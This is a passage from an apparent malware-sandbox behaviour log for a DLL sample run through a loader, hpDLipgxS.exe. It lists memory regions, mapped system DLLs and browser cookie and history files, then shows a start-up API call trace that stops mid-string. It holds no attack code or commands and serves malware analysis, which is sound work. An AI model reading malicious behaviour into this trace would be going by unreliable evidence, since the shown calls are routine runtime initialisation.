end_va = 0x2c5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027b0000" filename = "" Region: id = 588 start_va = 0x73f90000 end_va = 0x7400ffff monitored = 0 entry_point = 0x73fa37c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 589 start_va = 0x2c60000 end_va = 0x2ddffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c60000" filename = "" Region: id = 590 start_va = 0xa50000 end_va = 0xb2efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a50000" filename = "" Region: id = 591 start_va = 0xb50000 end_va = 0xf4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b50000" filename = "" Region: id = 592 start_va = 0x300000 end_va = 0x300fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 593 start_va = 0x2de0000 end_va = 0x30aefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 594 start_va = 0x520000 end_va = 0x520fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 595 start_va = 0x759b0000 end_va = 0x75a32fff monitored = 0 entry_point = 0x759b23d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 596 start_va = 0x530000 end_va = 0x530fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 597 start_va = 0x74e90000 end_va = 0x74e9afff monitored = 0 entry_point = 0x74e952a0 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 598 start_va = 0x75090000 end_va = 0x750c4fff monitored = 0 entry_point = 0x7509145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 599 start_va = 0x77430000 end_va = 0x77435fff monitored = 0 entry_point = 0x77431782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 600 start_va = 0x74e20000 end_va = 0x74e80fff monitored = 0 entry_point = 0x74e5bf40 region_type = mapped_file name = "wbemcomn2.dll" filename = "\\Windows\\SysWOW64\\wbemcomn2.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn2.dll") Region: id = 601 start_va = 0x74e00000 end_va = 0x74e16fff monitored = 0 entry_point = 0x74e035fa region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 602 start_va = 0x30b0000 end_va = 0x327ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000030b0000" filename = "" Region: id = 603 start_va = 0x2800000 end_va = 0x283ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002800000" filename = "" Region: id = 604 start_va = 0x2860000 end_va = 0x2c5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002860000" filename = "" Region: id = 605 start_va = 0x32b0000 end_va = 0x33affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000032b0000" filename = "" Region: id = 606 start_va = 0x7efaa000 end_va = 0x7efacfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 607 start_va = 0x73e00000 end_va = 0x73e16fff monitored = 0 entry_point = 0x73e03573 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 608 start_va = 0x630000 end_va = 0x66bfff monitored = 0 entry_point = 0x63128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 609 start_va = 0x630000 end_va = 0x66bfff monitored = 0 entry_point = 0x63128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 610 start_va = 0x630000 end_va = 0x66bfff monitored = 0 entry_point = 0x63128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 611 start_va = 0x630000 end_va = 0x66bfff monitored = 0 entry_point = 0x63128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 612 start_va = 0x630000 end_va = 0x66bfff monitored = 0 entry_point = 0x63128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 613 start_va = 0x73dc0000 end_va = 0x73dfafff monitored = 0 entry_point = 0x73dc128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 614 start_va = 0x73f80000 end_va = 0x73f8dfff monitored = 0 entry_point = 0x73f81235 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\SysWOW64\\RpcRtRemote.dll" (normalized: "c:\\windows\\syswow64\\rpcrtremote.dll") Region: id = 615 start_va = 0xa00000 end_va = 0xa3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a00000" filename = "" Region: id = 616 start_va = 0x10c0000 end_va = 0x10fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010c0000" filename = "" Region: id = 617 start_va = 0x2c80000 end_va = 0x2d7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c80000" filename = "" Region: id = 618 start_va = 0x2da0000 end_va = 0x2ddffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002da0000" filename = "" Region: id = 619 start_va = 0x3400000 end_va = 0x34fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003400000" filename = "" Region: id = 620 start_va = 0x7efa4000 end_va = 0x7efa6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa4000" filename = "" Region: id = 621 start_va = 0x7efa7000 end_va = 0x7efa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa7000" filename = "" Region: id = 1000 start_va = 0x74df0000 end_va = 0x74dfefff monitored = 0 entry_point = 0x74df93d0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 1001 start_va = 0x723a0000 end_va = 0x72445fff monitored = 0 entry_point = 0x7240a2f0 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 1002 start_va = 0x74dd0000 end_va = 0x74de7fff monitored = 0 entry_point = 0x74dd1335 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\SysWOW64\\ntdsapi.dll" (normalized: "c:\\windows\\syswow64\\ntdsapi.dll") Region: id = 1003 start_va = 0x30b0000 end_va = 0x31affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000030b0000" filename = "" Region: id = 1004 start_va = 0x3240000 end_va = 0x327ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003240000" filename = "" Region: id = 1005 start_va = 0x540000 end_va = 0x548fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1117 start_va = 0x75b50000 end_va = 0x75c44fff monitored = 0 entry_point = 0x75b51865 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 1118 start_va = 0x75410000 end_va = 0x75545fff monitored = 0 entry_point = 0x75411b35 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 1119 start_va = 0x75f00000 end_va = 0x76020fff monitored = 0 entry_point = 0x75f0158e region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 1120 start_va = 0x75ef0000 end_va = 0x75efbfff monitored = 0 entry_point = 0x75ef238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 1121 start_va = 0x76e30000 end_va = 0x7702afff monitored = 0 entry_point = 0x76e322d9 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 1122 start_va = 0x540000 end_va = 0x541fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1123 start_va = 0x74130000 end_va = 0x742cdfff monitored = 0 entry_point = 0x7415e6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 1124 start_va = 0x550000 end_va = 0x550fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 1125 start_va = 0x560000 end_va = 0x561fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 1126 start_va = 0x550000 end_va = 0x550fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1127 start_va = 0x74120000 end_va = 0x7412afff monitored = 0 entry_point = 0x74121992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 1128 start_va = 0x630000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 1129 start_va = 0x640000 end_va = 0x647fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 1130 start_va = 0x650000 end_va = 0x65ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 1131 start_va = 0x740a0000 end_va = 0x740e3fff monitored = 0 entry_point = 0x740b63f9 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 1132 start_va = 0x710000 end_va = 0x74ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 1133 start_va = 0x74080000 end_va = 0x7409bfff monitored = 0 entry_point = 0x7408a431 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 1134 start_va = 0x74070000 end_va = 0x74076fff monitored = 0 entry_point = 0x7407128d region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 1135 start_va = 0x31b0000 end_va = 0x31effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031b0000" filename = "" Region: id = 1136 start_va = 0x35e0000 end_va = 0x36dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035e0000" filename = "" Region: id = 1137 start_va = 0x7efa1000 end_va = 0x7efa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa1000" filename = "" Region: id = 1138 start_va = 0x74030000 end_va = 0x7406bfff monitored = 0 entry_point = 0x7403145d region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 1139 start_va = 0x74020000 end_va = 0x74024fff monitored = 0 entry_point = 0x740215df region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\SysWOW64\\WSHTCPIP.DLL" (normalized: "c:\\windows\\syswow64\\wshtcpip.dll") Region: id = 1140 start_va = 0x73eb0000 end_va = 0x73f01fff monitored = 0 entry_point = 0x73eb14be region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\SysWOW64\\rasapi32.dll" (normalized: "c:\\windows\\syswow64\\rasapi32.dll") Region: id = 1141 start_va = 0x73e90000 end_va = 0x73ea4fff monitored = 0 entry_point = 0x73e912de region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\SysWOW64\\rasman.dll" (normalized: "c:\\windows\\syswow64\\rasman.dll") Region: id = 1142 start_va = 0x73e80000 end_va = 0x73e8cfff monitored = 0 entry_point = 0x73e81326 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\SysWOW64\\rtutils.dll" (normalized: "c:\\windows\\syswow64\\rtutils.dll") Region: id = 1143 start_va = 0x660000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 1144 start_va = 0x660000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1145 start_va = 0x73e70000 end_va = 0x73e75fff monitored = 0 entry_point = 0x73e7125a region_type = mapped_file name = "sensapi.dll" filename = "\\Windows\\SysWOW64\\SensApi.dll" (normalized: "c:\\windows\\syswow64\\sensapi.dll") Region: id = 1146 start_va = 0x73e60000 end_va = 0x73e6ffff monitored = 0 entry_point = 0x73e638c1 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\SysWOW64\\nlaapi.dll" (normalized: "c:\\windows\\syswow64\\nlaapi.dll") Region: id = 1147 start_va = 0x3500000 end_va = 0x35bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003500000" filename = "" Region: id = 1148 start_va = 0x36e0000 end_va = 0x385ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036e0000" filename = "" Region: id = 1149 start_va = 0x3860000 end_va = 0x3a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003860000" filename = "" Region: id = 1150 start_va = 0x33b0000 end_va = 0x33effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000033b0000" filename = "" Region: id = 1151 start_va = 0x3560000 end_va = 0x359ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003560000" filename = "" Region: id = 1152 start_va = 0x35b0000 end_va = 0x35bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035b0000" filename = "" Region: id = 1153 start_va = 0x3740000 end_va = 0x383ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003740000" filename = "" Region: id = 1154 start_va = 0x3850000 end_va = 0x385ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003850000" filename = "" Region: id = 1155 start_va = 0x3ac0000 end_va = 0x3bbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ac0000" filename = "" Region: id = 1156 start_va = 0x7ef9b000 end_va = 0x7ef9dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef9b000" filename = "" Region: id = 1157 start_va = 0x7ef9e000 end_va = 0x7efa0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef9e000" filename = "" Region: id = 1158 start_va = 0x73f70000 end_va = 0x73f75fff monitored = 0 entry_point = 0x73f714b2 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 1159 start_va = 0x6b0000 end_va = 0x6b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006b0000" filename = "" Region: id = 1160 start_va = 0x740f0000 end_va = 0x74110fff monitored = 0 entry_point = 0x740f145e region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 1161 start_va = 0x75550000 end_va = 0x75594fff monitored = 0 entry_point = 0x755511e1 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll") Region: id = 1162 start_va = 0x73900000 end_va = 0x73908fff monitored = 0 entry_point = 0x73901220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 1163 start_va = 0x6c0000 end_va = 0x6c7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "urlmon.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\urlmon.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\urlmon.dll.mui") Region: id = 1164 start_va = 0x74010000 end_va = 0x74015fff monitored = 0 entry_point = 0x74011673 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\SysWOW64\\wship6.dll" (normalized: "c:\\windows\\syswow64\\wship6.dll") Region: id = 1312 start_va = 0x1200000 end_va = 0x123ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 1313 start_va = 0x38c0000 end_va = 0x39bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000038c0000" filename = "" Region: id = 1314 start_va = 0x7ef98000 end_va = 0x7ef9afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef98000" filename = "" Region: id = 1315 start_va = 0x39c0000 end_va = 0x3a3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000039c0000" filename = "" Region: id = 1403 start_va = 0x3320000 end_va = 0x335ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003320000" filename = "" Region: id = 1404 start_va = 0x3740000 end_va = 0x383ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003740000" filename = "" Region: id = 1405 start_va = 0x7efaa000 end_va = 0x7efacfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 1407 start_va = 0x3280000 end_va = 0x32bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003280000" filename = "" Region: id = 1408 start_va = 0x3300000 end_va = 0x33fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003300000" filename = "" Region: id = 1409 start_va = 0x7efaa000 end_va = 0x7efacfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Thread: id = 1 os_tid = 0xedc [0040.648] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x40fe3c | out: lpSystemTimeAsFileTime=0x40fe3c*(dwLowDateTime=0x270873a0, dwHighDateTime=0x1d92f76)) [0040.649] GetCurrentThreadId () returned 0xedc [0040.649] GetCurrentProcessId () returned 0xed8 [0040.649] QueryPerformanceCounter (in: lpPerformanceCount=0x40fe34 | out: lpPerformanceCount=0x40fe34*=2740599359896) returned 1 [0040.649] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0040.649] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x73a50000 [0040.653] GetProcAddress (hModule=0x73a50000, lpProcName="InitializeCriticalSectionEx") returned 0x0 [0040.653] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0040.653] GetLastError () returned 0x7e [0040.653] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x75130000 [0040.653] GetProcAddress (hModule=0x75130000, lpProcName="FlsAlloc") returned 0x75144ee3 [0040.653] GetProcAddress (hModule=0x75130000, lpProcName="FlsSetValue") returned 0x751441c0 [0040.654] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x73a50000 [0040.655] GetProcAddress (hModule=0x73a50000, lpProcName="InitializeCriticalSectionEx") returned 0x0 [0040.655] GetProcessHeap () returned 0x750000 [0040.655] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0040.655] GetLastError () returned 0x7e [0040.655] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x75130000 [0040.655] GetProcAddress (hModule=0x75130000, lpProcName="FlsAlloc") returned 0x75144ee3 [0040.655] GetLastError () returned 0x7e [0040.655] GetProcAddress (hModule=0x75130000, lpProcName="FlsGetValue") returned 0x75141252 [0040.655] GetProcAddress (hModule=0x75130000, lpProcName="FlsSetValue") returned 0x751441c0 [0040.655] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x364) returned 0x765240 [0040.656] SetLastError (dwErrCode=0x7e) [0040.656] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0xe00) returned 0x7655b0 [0040.657] GetStartupInfoW (in: lpStartupInfo=0x40fd74 | out: lpStartupInfo=0x40fd74*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\Desktop\\hpDLipgxS.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1272780, hStdOutput=0x3fca9690, hStdError=0xfffffffe)) [0040.658] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0040.658] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0040.658] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0040.658] GetCommandLineA () returned="\"C:\\Users\\kEecfMwgj\\Desktop\\hpDLipgxS.exe\" /dll=\"C:\\Users\\KEECFM~1\\Desktop\\e609894b274a6c42e971e8082af8fd167ade4aef5d1a3816d5acea04839f0b35.dll\"" [0040.658] GetCommandLineW () returned="\"C:\\Users\\kEecfMwgj\\Desktop\\hpDLipgxS.exe\" /dll=\"C:\\Users\\KEECFM~1\\Desktop\\e609894b274a6c42e971e8082af8fd167ade4aef5d1a3816d5acea04839f0b35.dll\"" [0040.658] GetACP () returned 0x4e4 [0040.658] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x220) returned 0x764ee8 [0040.658] IsValidCodePage (CodePage=0x4e4) returned 1 [0040.658] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x40fd94 | out: lpCPInfo=0x40fd94) returned 1 [0040.658] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x40f65c | out: lpCPInfo=0x40f65c) returned 1 [0040.658] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x40fc70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0040.658] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x40fc70, cbMultiByte=256, lpWideCharStr=0x40f3f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0040.658] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x40f670 | out: lpCharType=0x40f670) returned 1 [0040.658] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x40fc70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0040.658] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x40fc70, cbMultiByte=256, lpWideCharStr=0x40f3b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0040.658] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0040.658] GetLastError () returned 0x7e [0040.659] GetProcAddress (hModule=0x75130000, lpProcName="LCMapStringEx") returned 0x751c4d91 [0040.659] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0040.659] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ 